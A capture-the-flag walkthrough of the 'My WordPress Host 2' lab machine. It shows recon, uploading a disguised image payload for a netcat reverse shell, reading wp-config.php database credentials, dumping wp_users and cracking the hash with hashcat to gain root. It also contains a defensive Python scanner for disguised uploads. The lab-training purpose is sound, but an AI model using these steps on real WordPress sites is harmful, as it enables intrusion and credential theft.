My WordPress Host 2: Walkthrough (Infosec Warrior)
Today we'll be continuing with a new machine from Infosec Warrior. In this article we will walk through an interesting Infosec Warrior machine called My WordPress Host 2.
Here is the link to download this VM:
Network Scanning
We always start with network scanning. Let's find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in the netdiscover result, our target IP address is 192.168.43.94.
Enumeration/Reconnaissance
Our next step is scanning the target machine. Let's start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.94
With the help of nmap we are able to scan all open TCP ports.
Starting with port 80, which is HTTP. The site is reached later as www.infosec.local, so first add that hostname to /etc/hosts:
┌─[root@RDX]─[~]
└──╼ #vim /etc/hosts
Open http://192.168.43.94/ in the browser.
┌─[✗]─[root@RDX]─[~]
└──╼ #wpscan --url http://192.168.43.94/ --enumerate ap --plugins-detection aggressive
Go to the Site Editor plugin and find its exploit on the web.
Exploitation
Rename the payload so that it has a .gif or .jpg extension.
Upload the abc.gif payload through the Contact Us form.
Call the gif payload in the browser:
http://www.infosec.local/wp-content/uploads/2020/12/abc.gif
┌─[✗]─[root@RDX]─[~]
└──╼ #nc -nlvp 443
Then open the payload URL in the browser to get the reverse shell.
Now I have the shell.
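The foothold above is a script renamed to abc.gif and fetched straight out of wp-content/uploads. From the defender's side the same trick is easy to spot on disk: a file whose extension claims an image but whose first bytes are not that format's magic number, or that contains a PHP open tag at all. The following scanner is an added example for this walkthrough, not code from the original post; the uploads tree and the three sample files it builds are constructed here and are not taken from the target machine. Beyond the renamed-file case the page shows, it also catches a valid JPEG header with PHP appended, which passes a magic-bytes check alone.

```python
"""Scan a WordPress uploads tree for scripts disguised as images (added example)."""
import os
import re
import tempfile

# Magic numbers for the image types WordPress accepts by default.
IMAGE_MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
}

# PHP open tags: "<?php", the short echo tag "<?=", and the old
# "<script language=php>" form that some parsers still honour.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)|<script\s+language\s*=\s*['\"]?php",
                     re.IGNORECASE)


def classify_file(path):
    """Return the reasons why `path` looks like a script disguised as an image;
    an empty list means the file looks clean."""
    reasons = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    expected = IMAGE_MAGIC.get(ext)
    if expected is not None and not data.startswith(expected):
        reasons.append("extension %s but magic bytes %r do not match" % (ext, data[:4]))
    if PHP_TAG.search(data):
        reasons.append("contains a PHP open tag")
    return reasons


def find_disguised_uploads(root):
    """Walk an uploads tree and map relative path -> reasons for every suspect file."""
    findings = {}
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            reasons = classify_file(path)
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings[rel] = reasons
    return findings


def build_sample_uploads():
    """Constructed sample tree shaped like wp-content/uploads/2020/12.
    The files are made up for this example, not taken from the target."""
    root = tempfile.mkdtemp(prefix="uploads-")
    sub = os.path.join(root, "2020", "12")
    os.makedirs(sub)
    samples = {
        # a minimal real GIF header: should pass
        "logo.gif": b"GIF89a" + b"\x00" * 32,
        # a PHP file renamed to .gif, as in the walkthrough: wrong magic and a PHP tag
        "abc.gif": b"<?php /* renamed script, constructed for the example */ ?>",
        # a valid JPEG header with PHP appended: magic passes, the tag scan catches it
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"<?php /* appended */ ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(sub, name), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, why in sorted(find_disguised_uploads(build_sample_uploads()).items()):
        print(rel, "->", "; ".join(why))
```

Run it against a real wp-content/uploads by passing that directory to find_disguised_uploads. Detection is the second line of defence; the first is that nothing under uploads should be executable as PHP at all, which the web server configuration can enforce regardless of what a form plugin lets through.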
$ id
$ python3.7 -c 'import pty;pty.spawn("/bin/bash")'
www-data@wordpress:/$
www-data@wordpress:/$ cd /var/www/html/wordpress
www-data@wordpress:/var/www/html/wordpress$ cat wp-config.php
/** MySQL database username */
define( 'DB_USER', 'root' );
/** MySQL database password */
define( 'DB_PASSWORD', 'root' );
Privilege Escalation
www-data@wordpress:/$ mysql -u root -p
mysql -u root -p
Enter password: root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 19
Server version: 5.7.29 MySQL Community Server (GPL)

Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases ;
mysql> use wordpress_db ;
mysql> show tables;
mysql> select * from wp_users ;
mysql> exit ;
┌─[root@RDX]─[~]
└──╼ #vim password.txt
$P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.
┌─[root@RDX]─[~]
└──╼ #hashcat -m 400 -a 0 -o pass.txt password.txt /root/rockyou.txt
hashcat (v6.1.1) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

CUDA API (CUDA 11.0)
====================
* Device #1: GeForce GTX 1650, 3844/3911 MB, 16MCU

OpenCL API (OpenCL 1.2 CUDA 11.0.228) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1650, skipped

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
=============================================================================================================================
* Device #3: pthread-AMD Ryzen 7 3750H with Radeon Vega Mobile Gfx, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 345 MB

Dictionary cache built:
* Filename..: /root/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password- and salt-length (typically down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

Session..........: hashcat
Status...........: Cracked
Hash.Name........: phpass
Hash.Target......: $P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.
Time.Started.....: Wed Dec 30 20:32:08 2020 (25 secs)
Time.Estimated...: Wed Dec 30 20:32:33 2020 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 442.6 kH/s (6.68ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:8128-8192
Candidates.#1....: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 49c Util: 65% Core:1620MHz Mem:3500MHz Bus:8

Started: Wed Dec 30 20:32:00 2020
Stopped: Wed Dec 30 20:32:34 2020
┌─[root@RDX]─[~]
└──╼ #cat pass.txt
Now I have the password.
Rooting the machine
www-data@wordpress:/var/www/html/wordpress$ su root
su root
Password: Linuxroot
root@wordpress:/var/www/html/wordpress# cd
root@wordpress:~# ls
root@wordpress:~# id
root@wordpress:~# cat proof.txt
Successfully got root privileges and the 'proof.txt' flag.